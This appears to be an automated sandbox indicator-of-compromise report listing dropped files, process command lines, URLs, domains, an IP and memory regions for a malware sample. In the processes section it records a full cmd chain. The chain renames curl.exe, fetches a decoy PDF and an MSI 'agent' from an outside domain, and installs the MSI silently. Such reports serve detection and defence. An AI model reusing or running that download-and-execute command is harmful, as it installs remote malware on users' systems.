IOC Report

loading gif

Files

File Path
Type
Category
Malicious
C:\Program Files (x86)\AutoIt3\TNheBOJElq.exe
PE32 executable (console) Intel 80386, for MS Windows
dropped
\Device\ConDrv
ASCII text, with CR, LF line terminators
dropped

Processes

Path
Cmdline
Malicious
C:\Windows\SysWOW64\cmd.exe
cmd /C ""C:\Windows\System32\cmd.exe" /c cd /d "C:\Users\Gloza\AppData\Local\Temp\" & copy c:\windows\system32\curl.exe TNheBOJElq.exe & TNheBOJElq.exe -o "C:\Users\Gloza\Documents\QMQjaBdqIo.pdf" https://dbs5.pwods.com/download/pdf & "C:\Users\Gloza\Documents\QMQjaBdqIo.pdf" & TNheBOJElq.exe -o bLhLldebqq.msi https://dbs5.pwods.com/download/agent & C:\Windows\System32\msiexec.exe /i bLhLldebqq.msi /qn"
C:\Windows\System32\conhost.exe
C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
C:\Windows\SysWOW64\cmd.exe
"C:\Windows\System32\cmd.exe" /c cd /d "C:\Users\Gloza\AppData\Local\Temp\"
C:\Program Files (x86)\AutoIt3\TNheBOJElq.exe
TNheBOJElq.exe -o "C:\Users\Gloza\Documents\QMQjaBdqIo.pdf" https://dbs5.pwods.com/download/pdf
C:\Program Files (x86)\AutoIt3\TNheBOJElq.exe
TNheBOJElq.exe -o bLhLldebqq.msi https://dbs5.pwods.com/download/agent
C:\Windows\SysWOW64\msiexec.exe
C:\Windows\System32\msiexec.exe /i bLhLldebqq.msi /qn
C:\Windows\System32\msiexec.exe
C:\Windows\system32\msiexec.exe /V

URLs

Name
IP
Malicious
https://curl.se/docs/hsts.html
unknown
https://dbs5.pwods.com/download/pdf
8.209.119.17
https://curl.se/docs/copyright.htmlD
unknown
https://curl.se/libcurl/c/curl_easy_setopt.html
unknown
https://dbs5.pwods.com/download/agent
8.209.119.17
https://curl.se/P
unknown
https://curl.se/docs/http-cookies.html#
unknown
https://curl.se/docs/http-cookies.html
unknown
https://curl.se/docs/hsts.html#
unknown
https://curl.se/docs/sslcerts.html
unknown
https://curl.se/docs/sslcerts.htmlcurl
unknown
There are 1 hidden URLs, click here to show them.

Domains

Name
IP
Malicious
dbs5.pwods.com
8.209.119.17

IPs

IP
Domain
Country
Malicious
8.209.119.17
dbs5.pwods.com
Singapore
127.0.0.1
unknown
unknown

Memdumps

Base Address
Regiontype
Protect
Malicious
2C00000
heap
page read and write
27FD000
stack
page read and write
2AC4000
heap
page read and write
2F66000
heap
page read and write
2F67000
heap
page read and write
3070000
remote allocation
page read and write
2A9B000
heap
page read and write
29AD000
stack
page read and write
130000
unkown
page readonly
2A50000
heap
page read and write
2F63000
heap
page read and write
2F84000
heap
page read and write
31CF000
stack
page read and write
2A63000
heap
page read and write
115000
unkown
page readonly
12F000
unkown
page read and write
2AAB000
heap
page read and write
2C25000
heap
page read and write
2F40000
remote allocation
page read and write
2FC3000
heap
page read and write
2BEE000
stack
page read and write
2F95000
heap
page read and write
2F85000
heap
page read and write
2FAA000
heap
page read and write
C1000
unkown
page execute read
2FC3000
heap
page read and write
2F40000
remote allocation
page read and write
2F84000
heap
page read and write
2A6C000
heap
page read and write
2F40000
remote allocation
page read and write
2AC4000
heap
page read and write
2A94000
heap
page read and write
115000
unkown
page readonly
2DFE000
stack
page read and write
2EFF000
stack
page read and write
2C20000
heap
page read and write
2F98000
heap
page read and write
2A85000
heap
page read and write
30DF000
stack
page read and write
C0000
unkown
page readonly
2D60000
heap
page read and write
C0000
unkown
page readonly
12F000
unkown
page read and write
30CE000
stack
page read and write
3070000
remote allocation
page read and write
2A58000
heap
page read and write
2FC3000
heap
page read and write
C1000
unkown
page execute read
2F9A000
heap
page read and write
2A94000
heap
page read and write
2CFD000
stack
page read and write
2AAB000
heap
page read and write
2A94000
heap
page read and write
2F4F000
stack
page read and write
115000
unkown
page readonly
3050000
heap
page read and write
2BAE000
stack
page read and write
C0000
unkown
page readonly
2D5E000
stack
page read and write
2AC4000
heap
page read and write
C1000
unkown
page execute read
2F58000
heap
page read and write
2D75000
heap
page read and write
2F3E000
stack
page read and write
2FD0000
heap
page read and write
2F50000
heap
page read and write
130000
unkown
page readonly
130000
unkown
page readonly
2D70000
heap
page read and write
2BF0000
heap
page read and write
2D10000
heap
page read and write
2F68000
heap
page read and write
3070000
remote allocation
page read and write
2A94000
heap
page read and write
2F69000
heap
page read and write
2F97000
heap
page read and write
2F98000
heap
page read and write
2FAA000
heap
page read and write
2A85000
heap
page read and write
C0000
unkown
page readonly
C1000
unkown
page execute read
3080000
heap
page read and write
2A6A000
heap
page read and write
130000
unkown
page readonly
2A85000
heap
page read and write
2A60000
heap
page read and write
2A64000
heap
page read and write
115000
unkown
page readonly
2A69000
heap
page read and write
2B60000
heap
page read and write
26FD000
stack
page read and write
2A85000
heap
page read and write
2F60000
heap
page read and write
There are 83 hidden memdumps, click here to show them.